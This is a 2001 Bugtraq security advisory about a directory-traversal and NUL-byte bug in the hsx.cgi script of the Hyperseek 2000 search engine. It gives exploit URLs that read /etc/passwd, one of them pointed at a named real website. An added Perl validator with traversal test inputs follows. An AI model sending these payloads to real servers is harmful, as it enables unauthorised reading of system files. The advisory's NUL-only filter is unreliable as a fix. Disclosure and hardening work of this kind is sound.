Date: Sun, 28 Jan 2001 10:28:52 +0300
From: MC GaN <vipersv@MAIL.RU>
Subject: Hyperseek 2000 Search Engine - "show directory & files" bug
To: BUGTRAQ@SECURITYFOCUS.COM

--== NerF security gr0up advisory ==--

--------------------------------------------------------------------
Hyperseek 2000 Search Engine - "show directory & files" bug.
--------------------------------------------------------------------

1. A standard Perl problem is in the statistics module, file hsx.cgi: the
   script does not filter ../ and %00. Through this bug, you can remotely
   read any file and list any directory.
   ../ - directory up; %00 - hex symbol that means end of line.

2. Exploit URL:
   http://www.victim.ru/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
   Note: the directory can change and the number of ../ can vary.

3. Example:
   http://www.netsurprise.de/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00

4. Filter symbols like:
   $dat =~ s/\0//g;

--------------------------------------------------------------------
NerF security gr0up (Russia) - www.nerf.f2s.com
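
The filter in item 4 strips only the NUL byte and leaves ../ in place. The following is an added example, not code from the advisory or from Hyperseek, showing a stricter check for a value like $dat: reject NUL instead of stripping it, allow-list a plain file name, and confirm the resolved path stays inside the intended directory. The helper name resolve_show, the $base directory and the file names are assumptions made for illustration; the advisory does not show how hsx.cgi handles the parameter internally.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Cwd qw(realpath);
use File::Temp qw(tempdir);
use File::Spec;

# Hypothetical helper: map an untrusted "show" value to a file under $base,
# or return undef. $base stands in for the script's statistics directory.
sub resolve_show {
    my ($base, $dat) = @_;
    return unless defined $dat && length $dat;
    # Reject (do not strip) NUL bytes: the OS treats NUL as the end of the name.
    return if $dat =~ /\0/;
    # Allow-list a plain file name: no slashes, no leading dot, no "..".
    return unless $dat =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/;
    return if $dat =~ /\.\./;
    # Resolve symlinks and confirm the result is still inside $base.
    my $root = realpath($base);
    my $full = realpath(File::Spec->catfile($root, $dat));
    return unless defined $full && index($full, "$root/") == 0 && -f $full;
    return $full;
}

# Constructed demo: a temporary directory holding one statistics file.
my $base = tempdir(CLEANUP => 1);
open(my $fh, '>', File::Spec->catfile($base, 'stats.txt')) or die "create: $!";
print {$fh} "hits=42\n";
close($fh);

# Constructed inputs, already URL-decoded as a CGI parameter would be.
my @tests = (
    'stats.txt',
    "../../../../../../etc/passwd\0",
    '../stats.txt',
    "stats.txt\0.html",
    '/etc/passwd',
);
for my $dat (@tests) {
    (my $shown = $dat) =~ s/\0/\\0/g;   # make NUL visible in the output
    my $path = resolve_show($base, $dat);
    printf "%-40s %s\n", $shown, defined $path ? 'allowed' : 'rejected';
}
```

Only the first input is reported as allowed; the other four are rejected before any file is opened.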